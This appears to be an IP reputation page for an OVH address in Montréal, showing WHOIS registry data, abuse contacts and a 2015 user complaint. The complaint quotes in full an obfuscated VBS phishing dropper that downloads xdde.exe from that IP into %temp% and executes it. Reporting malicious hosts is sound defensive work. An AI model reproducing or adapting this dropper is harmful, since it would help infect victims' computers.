IP: 192.99.19.178Canada Near: Montréal, Quebec, Canada
Country:
Canada
Region:
QC
City:
Montréal
Latitude:
45.504
Longitude:
-73.5747
NetRange: 192.99.0.0 - 192.99.255.255
CIDR: 192.99.0.0/16
NetName: OVH-ARIN-7
NetHandle: NET-192-99-0-0-1
Parent: NET192 (NET-192-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS16276
Organization: OVH Hosting, Inc. (HO-2)
RegDate: 2013-06-17
Updated: 2013-06-17
Comment: www.ovh.com
Ref: https://rdap.arin.net/registry/ip/192.99.0.0

OrgName: OVH Hosting, Inc.
OrgId: HO-2
Address: 800-1801 McGill College
City: Montreal
StateProv: QC
PostalCode: H3A 2N4
Country: CA
RegDate: 2011-06-22
Updated: 2017-01-28
Ref: https://rdap.arin.net/registry/entity/HO-2

OrgAbuseHandle: ABUSE3956-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-855-684-5463
OrgAbuseEmail: abuse@ovh.ca
OrgAbuseRef: https://rdap.arin.net/registry/entity/ABUSE3956-ARIN

OrgTechHandle: NOC11876-ARIN
OrgTechName: NOC
OrgTechPhone: +1-855-684-5463
OrgTechEmail: noc@ovh.net
OrgTechRef: https://rdap.arin.net/registry/entity/NOC11876-ARIN
DNS BlackList results:
Most recent complaints on 192.99.19.178
Complaint by Angelo Steffenel :

Inside a phishing email there is a VBS script that downloads a file from this address and executes it. Script: Dim KDhnYBYFkCfnMjsyxDhPb KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq" If KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq" Then End If WScript.Sleep 4000 Dim IDYVbPrSxIOQmVHlhhrMe IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY" If IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY" Then End If Dim pWLDnIbAxcaFeCLyYVoMl pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj" If pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj" Then End If path = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%") Dim jbOpkfGOcOSqeMWQsOtIV jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam" If jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam" Then End If path = path & "\" Dim bPKzPmlstEgupMlzTGcLE bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM" If bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM" Then End If URL = "http://192.99.19.178/xdde.exe" Dim UBuVzItKFfJxfYuSyMXRp UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu" If UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu" Then End If DJ = "foyoun.exe" Dim GiTlDQmIBtHlTvWlSngxD GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB" If GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB" Then End If dim GH: Set GH = createobject("Microsoft.XMLHTTP") Dim oCvKtmDggbKnfwaqsfiHn oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz" If oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz" Then End If dim NJ: Set NJ = createobject("Adodb.Stream") Dim XYYujdiLRWsDGyQrMdTdI XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf" If XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf" Then End If GH.Open "GET", URL, False Dim noJDsEnwMRwvIuMKrDqsQ noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ" If noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ" Then End If GH.Send Dim lJfIDLwdMkgxsqlxCSqdl lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi" If lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi" Then End If Dim LvwsgIYDgarbKxryMxqEo LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ" If LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ" Then End If with NJ Dim sIEULnfeEkUwMezeyNsVj sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt" If sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt" Then End If .type = 1 '//binary Dim EfbFlmGxEemgogWpEexDs EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl" If EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl" Then End If .open Dim bVARHccOjqvnFoOVovgLe bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj" If bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj" Then End If .write GH.responseBody Dim ROuABfAUaQknyFlzXwkgu ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm" If ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm" Then End If .savetofile path & DJ, 2 '//overwrite Dim jBOqyenfPJuctlqaxUrJI jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq" If jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq" Then End If end with Dim zEzFClGHhilWxXYPejjuT zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN" If zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN" Then End If Dim zUeKUpPqPdbZxcuJwtsvA zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL" If zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL" Then End If file = path & DJ Dim WqltKUVZZcPQsSPXrAioP WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij" If WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij" Then End If Set WshShell = WScript.CreateObject("WScript.Shell") Dim srTHesvHyvDBrVUtHvBgL srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ" If srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ" Then End If WshShell.Run chr(34) & file & chr(34)

Reported on: 13th, Jan. 2015

Please help us keep Internet safer and cleaner by leaving a descriptive comment about 192.99.19.178 IP address


DNSBL* - is a list of IP addresses published through the Internet Domain Name Service (DNS) either as a zone file that can be used by DNS server software, or as a live DNS zone that can be queried in real-time. DNSBLs are most often used to publish the addresses of computers or networks linked to spamming; most mail server software can be configured to reject or flag messages which have been sent from a site listed on one or more such lists.

WHOIS** - is a query/response protocol that is widely used for querying databases in order to determine the registrant or assignee of Internet resources, such as a domain name, an IP address block, or an autonomous system number. WHOIS lookups were traditionally performed with a command line interface application, and network administrators predominantly still use this method, but many simplified web-based tools exist. WHOIS services are typically communicated using the Transmission Control Protocol (TCP). Servers listen to requests on the well-known port number 43.

** Approximate Geographic Location - This is NOT the exact geographical location of the person/organization with the given IP address. However, this should still give you a good idea about the area/region where this person/orgranization is located.